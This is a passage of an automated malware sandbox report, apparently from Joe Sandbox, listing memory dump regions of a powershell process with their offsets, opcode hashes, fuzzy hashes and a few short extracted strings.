                  • Source File: 00000009.00000002.447175841.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_3d0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dcd69c4cb8b8a2a495287729c76a3f36327dcbceb6a7043d9266bc75fdd6333d
                  • Instruction ID: d8c7b3d1a395b6b268b338e98157e1e30714624363c4e0fd6eb535024ca89b6b
                  • Opcode Fuzzy Hash: dcd69c4cb8b8a2a495287729c76a3f36327dcbceb6a7043d9266bc75fdd6333d
                  • Instruction Fuzzy Hash: 3431E672A043059FDF278A25F81077A7BB6AF96310F2A40A7D444DB792D735CD81C762
                  Memory Dump Source
                  • Source File: 00000009.00000002.447175841.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_3d0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3378587b78cc2c151f6a8375fbd3dd3a507f1bcd169d6468678711d177de958d
                  • Instruction ID: fbd1613baf5686453f6fe4b629e6ab17fffaaa88d1c0107229e11d2da804e0e2
                  • Opcode Fuzzy Hash: 3378587b78cc2c151f6a8375fbd3dd3a507f1bcd169d6468678711d177de958d
                  • Instruction Fuzzy Hash: C3219537A042099FCB629F25E4407AABBF9AF55350F1680A7D454D73A2D770CE90C793
                  Memory Dump Source
                  • Source File: 00000009.00000002.447175841.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_3d0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: df951018ae4996f41bb345866c130023f000dc89cb4fb99db0550bfd3dd894d7
                  • Instruction ID: 5001a222fa45fda5f3573a981cd98b52d23c714efda2bc46314ef5360d8b1c78
                  • Opcode Fuzzy Hash: df951018ae4996f41bb345866c130023f000dc89cb4fb99db0550bfd3dd894d7
                  • Instruction Fuzzy Hash: 2D118176300200AFEB15DA55D880E66F7ABEB85310B1DC06BE8198B355CB32DD41D790
                  Memory Dump Source
                  • Source File: 00000009.00000002.447175841.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_3d0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: baa7f9f9f6f73a309894c553171e00a57d64207f3332dbc6fbcedeeae2b1cc37
                  • Instruction ID: de93fd66074198ac8214b79b18509c59e1875839f82f5d11d048c52320a0bc54
                  • Opcode Fuzzy Hash: baa7f9f9f6f73a309894c553171e00a57d64207f3332dbc6fbcedeeae2b1cc37
                  • Instruction Fuzzy Hash: AE11ED2074E3D82FEB1293704C65B6E2FB58F86700F59819FE086DF2E3C8A58D458322
                  Memory Dump Source
                  • Source File: 00000009.00000002.446271433.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_19d000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3517ef00a12e0dc5107bb27831d04a8660e9c43c5379a74fd2569c091d751f31
                  • Instruction ID: fe5ea47d72c4b98b9be108b18e4538c7a2f4884090616eb3e732bb6d8829d33a
                  • Opcode Fuzzy Hash: 3517ef00a12e0dc5107bb27831d04a8660e9c43c5379a74fd2569c091d751f31
                  • Instruction Fuzzy Hash: 9B01F231104340AAEB205E25ECC4B67FF98EF81724F2CC11AFC480B282D37A9D41DAB2
                  Memory Dump Source
                  • Source File: 00000009.00000002.447175841.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_3d0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0bf04d1fc925e9d2f7cc1b5d864b9173240425bb815ba6fe395de539d141529c
                  • Instruction ID: 98c51f11b16e78934a186be00400c3637b8683b15af745babc2d97af5bb084f9
                  • Opcode Fuzzy Hash: 0bf04d1fc925e9d2f7cc1b5d864b9173240425bb815ba6fe395de539d141529c
                  • Instruction Fuzzy Hash: 9DF0C27075031C37EA2467B58816F7F299A9FD4B00F508119F5469F3C2CDF29D8143A1
                  Memory Dump Source
                  • Source File: 00000009.00000002.446271433.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_19d000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 338804c69d6c5abf920c98fb0814f96770009a7d901bec8daa9283d832ff11b2
                  • Instruction ID: 3484ed47188356582154304d06e1f5ed7919449e327d9a936675aa37a16d723f
                  • Opcode Fuzzy Hash: 338804c69d6c5abf920c98fb0814f96770009a7d901bec8daa9283d832ff11b2
                  • Instruction Fuzzy Hash: F9F06271504344AFEB208A15DCC4B66FF98EB81734F18C55AED485E286C37A9C45CAB1
                  Memory Dump Source
                  • Source File: 00000009.00000002.447175841.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_3d0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ff4b2d0036766cc00e0a5c6350c75f06cb70e4a4874acb865efd8b808d325207
                  • Instruction ID: 4095466b4b90f6ef4e9b6ecea799c7d55d70bf7c54e9dd4ae4c68154c115cfeb
                  • Opcode Fuzzy Hash: ff4b2d0036766cc00e0a5c6350c75f06cb70e4a4874acb865efd8b808d325207
                  • Instruction Fuzzy Hash: C4E0D832B14244ABDF176670B0713EDB7967FE2251F114097C46097359DB308D06C362
                  Memory Dump Source
                  • Source File: 00000009.00000002.446518613.0000000000220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_220000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0aaa4e2656812b32ef618a15c44bca4eab64c380593067070a5e0f16072643fe
                  • Instruction ID: 977db59c654c8788b7a19c9163f091c2e72e4c2a658bbb2b6e6ec43aa7b4cf6b
                  • Opcode Fuzzy Hash: 0aaa4e2656812b32ef618a15c44bca4eab64c380593067070a5e0f16072643fe
                  • Instruction Fuzzy Hash: 9F22132146E3E16FD713A7BCA8A06E87FB1AF5331074A54D7D4C0CF1A3CA14596AC36A
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.447175841.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_3d0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: L4#p$L4#p$L4#p$L4#p$L4#p$L4#p$`8)$`8)$`8)
                  • API String ID: 0-809137675
                  • Opcode ID: 80b697e64b0679364e8c317139528a68172108c0b605227566e208c85ea72a4b
                  • Instruction ID: 1f71cb185e70f9199c168a91acb53b26a7f9f01d85a3a9b7a384094ae9739b92
                  • Opcode Fuzzy Hash: 80b697e64b0679364e8c317139528a68172108c0b605227566e208c85ea72a4b
                  • Instruction Fuzzy Hash: 71E13836B00208DFDF1A9E64E850BBE77A6AFC1710F15806BE9159B392CB71DD81CB52
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.447175841.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_3d0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: (Fc$(Fc$(Fc$L4#p$L4#p$L4#p$\9)
                  • API String ID: 0-3385104196
                  • Opcode ID: 5710fe4b0a061512cdc2000f923f098b3e5ef25f32dcaf1a3f07746f2496bf3a
                  • Instruction ID: 6ade98feed11f217a58b6bb9755a8795813434184ad1caeb061aefda00a4f525
                  • Opcode Fuzzy Hash: 5710fe4b0a061512cdc2000f923f098b3e5ef25f32dcaf1a3f07746f2496bf3a
                  • Instruction Fuzzy Hash: 64815D36B002089FDF1A9A24E8107BE7BA5EFC1B10F15806BE5519F392DB71DD51CBA2